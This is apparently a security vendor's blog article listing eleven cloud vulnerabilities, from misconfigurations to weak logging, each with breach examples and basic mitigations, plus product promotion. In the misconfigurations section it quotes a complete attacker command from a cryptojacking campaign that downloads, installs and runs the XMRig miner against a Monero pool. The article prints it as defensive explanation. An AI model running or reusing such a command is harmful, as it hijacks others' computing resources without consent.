What are cloud vulnerabilities?
Cloud security vulnerabilities are weaknesses in a cloud computing environment—like misconfigurations, a lack of encryption, and unsecured APIs—that attackers exploit to gain unauthorized access, steal data, or disrupt services.
According to Wiz Research’s 2025 findings, 54% of cloud environments face vulnerabilities due to serverless functions and exposed virtual machines (VMs) that contain critical data. But this is just one small part of the vulnerability landscape that your company should be aware of. . Attackers continue to seek out these vulnerabilities because they are easier to exploit. Even though they are common, organizations still do not take the proper steps to protect against these vulnerabilities, either because they are not aware of the risk or simply do not know how to mitigate them. This article hopes to address both of these issues.
Verizon, too, emphasizes the 2025 vulnerability climate. According to its 2025 Data Breach Investigations Report, “The exploitation of vulnerabilities has seen another year of growth as an initial access vector for breaches, reaching 20%.” The consequences of such data breaches include reputational damage, reduced profit margins, organizational and operational disruption, and legal fines. In fact, Statista reported an average cost of $9.48 million for a United States data breach in 2023.
The cause of most cloud breaches is one of several types of vulnerabilities, which attackers continue to seek out because they’re easier to exploit. Thankfully, there are ways to mitigate these vulnerabilities so you can avoid falling victim to breaches.
Get a Free 1-on-1 Vulnerability Assessment
Learn what makes Wiz the platform to enable your cloud security operation
The 11 cloud security vulnerabilities you’re sure to encounter
The most common cloud security vulnerabilities include the following:
We’ll explain each of these vulnerabilities below, with real-life examples of attacks that exploited these vulnerabilities and simple steps you can take to mitigate them:
1. Misconfigurations
Misconfigurations are errors in the security settings of cloud applications and systems, including VMs, containers, serverless environments, and infrastructure as code (IaC). They’re often the byproduct of administrative oversight, high-velocity development environments, a lack of awareness, and security misconceptions.
Ultimately, cloud misconfigurations are among the main attack vectors for data breaches. Common ones include open ports for outbound server traffic, overprivileged identities, a lack of monitoring, unsecured storage (like open S3 buckets), the use of default passwords and credentials, and third-party misconfigurations.
Real-life example:
Wiz Research found a cryptojacking campaign in June 2025 that a group called JINX-0132 was conducting. The group was exploiting misconfigurations in DevOps tooling, such as Docker API and Gitea, to deploy its software. For example, attackers would identify a misconfigured and outdated instance that facilitated remote code execution.
Each malicious task from the group looked like the following:
"Config": {
"command": "sh",
"args": [
"-c",
"apt-get update -y ; sudo apt-get update -y ; apt-get install wget ; sudo apt-get install wget ; wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz ; sudo wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz ; tar -xzf xmrig-6.22.2-linux-static-x64.tar.gz ; cd xmrig-6.22.2 ; chmod 777 xmrig ; sudo chmod 777 xmrig ; ./xmrig -o pool.supportxmr.com:443 -u 468VEByGGFQSN2bJG99ovhe5SG9SLxLAA9e2s7tWFxvBM33FAEP4JbwYHEeXexq8djYpDEHg9Jq6eGF3rREnAAc4UkjLd3E --tls --coin monero --cpu-max-threads-hint=90 -p {redacted}:4646"
]
}Basic mitigation steps:
Use a cloud security posture management tool to regularly audit and remediate cloud configurations.
Implement least privilege access to cloud resources.
Incorporate IaC to maintain consistent, correct configurations.
2. Lack of visibility
Enterprises often mix and match technologies from various cloud service providers ad hoc to create complex, interconnected, and constantly evolving IT environments. As a result, they may find cloud security vulnerabilities of different proportions scattered across this dynamic infrastructure.
Unfortunately, a lack of visibility can be detrimental to identifying, contextualizing, prioritizing, and mitigating these vulnerabilities. It’s impossible to assess the risk of cloud computing vulnerabilities without centralized, context-based visibility of the entire cloud ecosystem.
Real-life example:
A lack of visibility also means that companies can be vulnerable for years without knowing it. For instance, Toyota Japan unknowingly exposed the personal and vehicle data of 2.15 million customers for almost 10 years. With better visibility, Toyota could have identified and addressed the cloud misconfiguration that caused the data exposure much sooner.
Basic mitigation steps:
Implement centralized logging and monitoring solutions for all cloud resources.
Employ a cloud native application protection platform to gain visibility into all cloud assets and activity.
Set up alerts for unusual or unauthorized activities.
Regularly review and prune unnecessary resources.
The CVE Database: Curated Vulnerability Intelligence by Wiz
Wiz's CVE Database curates CVE data to create easy-to-navigate profiles that cover the entire vulnerability timeline, exploit scenarios, and mitigation steps.
Explore database
3. Poor access management
Digital identities vastly outnumber human identities in cloud environments, which makes them alluring targets for threat actors. That’s why identity and access management, as well as other identity-related cloud vulnerabilities, can be powerful initial attack vectors for cybercriminals to infiltrate an IT environment, exfiltrate data, and cause lateral damage.
Access management vulnerabilities include a lack of MFA, poor password and credential hygiene, misconfigured policies, mushrooming of administrative entitlements, and a lack of standardized, automated identity lifecycles and centralized access management capabilities.
Real-life example:
In 2024, attackers accessed email addresses, hashed passwords, and other credentials from Dropbox Sign using an access vulnerability within an automated system configuration tool. While the attack exposed users’ credentials, Dropbox was able to automatically mitigate the attack’s effect since it had isolated its Sign infrastructure from its other tools and systems.
Basic mitigation steps:
Implement least privilege access to cloud resources.
Use role-based access control to grant users only the permissions they need.
Adopt MFA and single sign-on solutions.
Conduct training sessions for proper access management practices.
Adopt a cloud access security broker to monitor and control access to cloud resources.
4. Insider threats
Insider threats are vulnerabilities that are due to individuals or entities that already have some degree of access to and knowledge of an enterprise’s IT environment. Potential insiders include current and former employees, third-party vendors, and partners.
These threats result from accidental errors, negligence, or malicious intent. Insider attacks via phishing and other social engineering techniques are common because humans are always the weakest link in a company’s cybersecurity posture.
Real-life example:
Disgruntled cloud professionals are major security threats to enterprises because of their in-depth knowledge of cloud computing vulnerabilities and how to exploit them. For instance, the 2019 Capital One breach—which compromised the data of over 100 million Americans and Canadians—was a result of actions that a former Amazon engineer took. This threat actor had the know-how and technical expertise to hack Capital One’s Amazon cloud infrastructure. The result was a cyberattack that cost an estimated $100M–$150M to remediate.
In a more recent example, grocery startup KiranaPro faced a breach after conducting layoffs. A disgruntled former employee eliminated sections of backend infrastructure, including cloud logs and GitHub code, to sabotage the company.
Basic mitigation steps:
Monitor employee activity for suspicious behavior.
Implement strict access controls, even for trusted insiders.
Conduct background checks on employees who have critical access.
Offer training and create a company culture that emphasizes cybersecurity.
Vulnerability Management Buyer's Guide
This buyers guide will not only help you objectively choose or replace a vulnerability management solution, but also provide insights on how your organization can work together to own the responsibility of security as one team.
5. Unsecured APIs
Because cloud APIs are the connective tissue that facilitates communication and data exchange between cloud software and applications, API vulnerabilities are a prominent attack vector for threat actors. Examples of vulnerabilities with unsecured APIs include suboptimal access controls, weak authentication protocols, wrong rate limits, and accidental data exposure.
Real-life example:
The attack vector for the Optus data breach in 2022 was an unsecured, publicly available API that didn’t require authentication protocols to access. This breach compromised around 10 million customers’ sensitive records.
Basic mitigation steps:
Implement strong authentication and authorization mechanisms for cloud APIs.
Use rate limiting and other controls to prevent API abuse.
Regularly scan APIs for vulnerabilities.
6. Zero-days
Zero-day vulnerabilities are those that your team hasn’t yet patched. They occur when threat actors exploit unidentified and unknown security vulnerabilities. They can come in many forms, like some we previously mentioned, but only become vulnerabilities due to a lack of detection and monitoring.
Real-life example:
Microsoft and Google are two of the most prominent victims of zero-day attacks. In 2023, glitches in Microsoft Windows and Office products could have allowed threat actors to conduct remote code execution attacks, exfiltrate data, and lock access for legitimate users. That same year, Google had to address a series of zero-day Chrome vulnerabilities, one of which had a high severity score.
Basic mitigation steps:
Keep all software and systems up-to-date.
Implement intrusion detection and prevention systems.
Use virtual patching to mitigate risks until vendors release patches.
7. Shadow IT
Shadow IT involves the use of your cloud assets without your IT department’s approval or support. There are several security risks associated with this, including the financial impact of staff creating cloud workloads for personal use, data loss via unauthorized file sharing services, and the use of unauthorized messaging services for communications.
Some users who are frustrated with in-house technology may look to more familiar tools to improve their productivity, while others want to leverage loopholes to spend their time on non-work activities—or even steal company data.
Real-life example:
In 2024, fintech provider Finastra learned that an attacker had accessed a third-party secure file transfer platform (SFTP) that it used for customer file transfers. The stolen data included sensitive customer files, which the attacker put up for sale on the dark web. The vendor shadow IT issue occurred because the SFTP was outside the company’s central security team’s control and monitoring. Because the team wasn’t managing this process, Finastra didn’t detect the breach immediately.
Basic mitigation steps:
Eliminate shadow code, or unauthorized code, that developers use.
Design business-specific security policies to meet your organization’s unique requirements and objectives.
Leverage access controls across cloud environments to police IT assets, who can commission them, and where they can integrate them.
8. Lack of encryption
When you encrypt data, you transform it into a format that users can only read if they have the encryption key. Because of this, even if unauthorized individuals obtain the encrypted data, they can’t decipher it. A lack of encryption, however, presents a significant vulnerability in cloud storage since it allows unauthorized individuals to access sensitive data if they infiltrate the cloud environment.
Additionally, encryption in transit for cloud services (like HTTPS) prevents malicious users from accessing data as it moves between systems.
Real-life example:
One of the most significant data breaches in history occurred at Equifax, one of three major consumer credit reporting agencies in the US. This 2017 cyberattack compromised about 148 million people’s personal data. While the root cause of the breach was an unpatched vulnerability in the Apache Struts web framework, subsequent investigations found that Equifax had stored sensitive data without encryption, which significantly exacerbated the breach’s impact.
Basic mitigation steps:
Encrypt data in transit, as well as at rest, to avoid unintentionally allowing third-party access to cloud data.
Configure your systems and data stores so users can only access them via secure protocols.
Use firewalls to block insecure access methods.
Consider full disk encryption using AES256 for maximum security for VM disks.
Leverage transparent data encryption to keep databases secure while in use.
9. Inadequate segmentation
Many cloud environments lack strong segmentation controls, which makes it easier for attackers to move laterally when they gain access. Implementing segmentation, however, can prevent a breach from escalating, spreading to different parts of the cloud environment, and affecting assets like customer data and credentials.
Real-life example:
In 2025, Unimicron, Presto, and other companies faced an increase in ransomware attacks. Due to poor segmentation, particularly between IT and operational technology, compromises spread across environments in most of these instances.
Another victim was the South African Weather Service (SAWS). Due to the attack, the organization faced issues with its forecasting process and couldn’t rely on its system for accurate reporting. Instead, SAWS had to use different sources to provide information, and its limited service affected critical sectors like aviation and marine.
Basic mitigation steps:
Enforce strict network zoning to control traffic flow.
Deploy internal firewalls, add continuous monitoring, and validate and test your segmentation regularly.
Segment access to your critical systems by making isolation the default protocol and creating essential assets with controlled gateways.
10. Vulnerable dependencies
When cloud native applications depend on third-party resources like libraries and services, they need to consider compromises across systems. If a partner, for example, updates its system, this could unknowingly introduce malicious code or backdoors to your environment.
These dangers should remind organizations to be aware of third-party security gaps and build their own security infrastructure. Solutions like Wiz also identify third-party risks and provide features for mitigation and protection.
Real-life example:
Attackers found a vulnerability in MOVEit, a file transfer app, when CL0p threat actors injected malware to retrieve private information. The breach of this third-party file transfer tool affected thousands of organizations worldwide that relied on it to transfer data both internally and externally.
Basic mitigation steps:
Maintain an inventory of your third-party services, SDKs, and libraries.
Scan unknown vulnerabilities with automated, cloud native solutions like Wiz.
Monitor security alerts to patch dependency risks quickly.
Implement runtime security tools to find strange behavior from third-party code and applications.
11. Deficient logging and monitoring
You could face cloud threats for months without detection if you aren’t actively monitoring your cloud environment. Because of this, a small compromise could turn into a much larger cloud breach across your infrastructure.
Real-life example:
Jelly Bean Communications, which created and hosted a website for children’s health insurance, faced a fine for a breach that remained undetected for seven years (2013–2020). Because the company had to comply with the HIPAA Security Rule, it faced severe consequences when a federal inquiry found that the breach was a direct result of the company neglecting to patch multiple site vulnerabilities. In 2023, Jelly Bean settled the case for $293,771 due to the failure, which potentially exposed 3.5 million applicants and enrollees.
Basic mitigation steps:
Document relevant events like log attempts, failed authentication, API calls, and other details to help you find anomalies. (A solution like Wiz helps you filter out noise and prioritize risks.)
Centralize your logs from servers, applications, and cloud services into one cloud native solution for full visibility.
Automate detection and alerting to get on top of issues in real time.
A walkthrough of the cloud vulnerability management lifecycle
Understanding the six-part vulnerability management lifecycle below will help you take action, stay organized, and manage risk with confidence:
Discovery and assessment: Scan your environment to uncover misconfigurations, unpatched software, and exposure points. Without full coverage, you risk missing critical blind spots in identity, data, or runtime.
Prioritization: Filter findings based on real-world exploitability, not just CVSS scores. Teams often waste time patching irrelevant issues while real risks go unaddressed.
Remediation: Assign fixes to the right teams and move fast to block attack paths. Delays, unclear ownership, and risky patches can leave windows open for compromise.
Verification and monitoring: Continuously validate that fixes remain effective so risks don’t recur. Drift, poor visibility, and skipped re-scans can reintroduce threats quietly.
Reporting: Track trends and outcomes to show your security progress. Many teams default to issue counts, but execs should care about time to remediate in order to reduce risk.
Improvement: Use the lessons you’ve learned to improve your tooling, workflows, and response speed. Neglecting continuous vulnerability management for a static checklist limits your long-term maturity.
The role of automation in spotting and addressing vulnerabilities
One way to immediately improve your vulnerability management process is by using automation. This technology speeds up your process, eliminates human error and blind spots, and provides more comprehensive security.
Here’s how automation can improve your risk management:
Finds new assets and vulnerabilities immediately
Organizes risks to your organization and security by severity so you know which to manage first
Orchestrates remediation through efficient workflows
Real-world example: Automation proved especially useful for one US Navy research facility and its partnership with tech firm Strategic Business Systems (SBS). Due to a complex cloud environment and high standards from the Department of Defense (DoD), the firm needed a solution to secure its infrastructure while maintaining full visibility. SBS chose Wiz to centralize the US Navy facility’s environment, with automation at the forefront. Due to Wiz’s automated security, scanning, and compliance features, SBS could then meet the DoD’s standards.
Overall, adding automation to your security stack minimizes manual processes and helps you scale your defense into a proactive security approach. As we saw in the previous example, Wiz’s agentless scanning and AI-powered remediation features help with this by providing contextual guidance throughout the code-to-cloud pipeline.
Wiz: A better approach to combating cloud vulnerabilities
The volume of cloud security vulnerabilities in dynamic IT environments is often overwhelming for businesses. And while they may use traditional vulnerability management solutions to identify and remediate vulnerabilities, these often lack the context that businesses need to prioritize low-risk vulnerabilities.
Wiz tackles these challenges by focusing on the most crucial and highest-risk cloud vulnerabilities via agentless deep vulnerability scanning and analysis.
As we scale and gain more customers, we are confident that we can tell them we are aware of all known vulnerabilities, and that new vulnerabilities will be quickly visible to us too.
Kashfun Nazir, Information Security Lead & Data Protection Officer, Atlan
Because Wiz’s cloud vulnerability risk assessment considers workload, cloud, and business context, it doesn’t just uncover vulnerabilities—it also illustrates how and why they impact your organization. This helps you keep your IT environments safe from cloud computing vulnerabilities without alert fatigue. Request a demo today to learn how Wiz’s unique approach to mitigating cloud security vulnerabilities can fortify your cloud environments.
Want to see your cloud infrastructure’s health now? Download our free CVE Risk Assessment to identify the vulnerabilities that expose your cloud and learn how to address them effectively.
Expose cloud risks no other tool can
Learn how Wiz Cloud surfaces toxic combinations across misconfigurations, identities, vulnerabilities, and data—so you can take action fast.
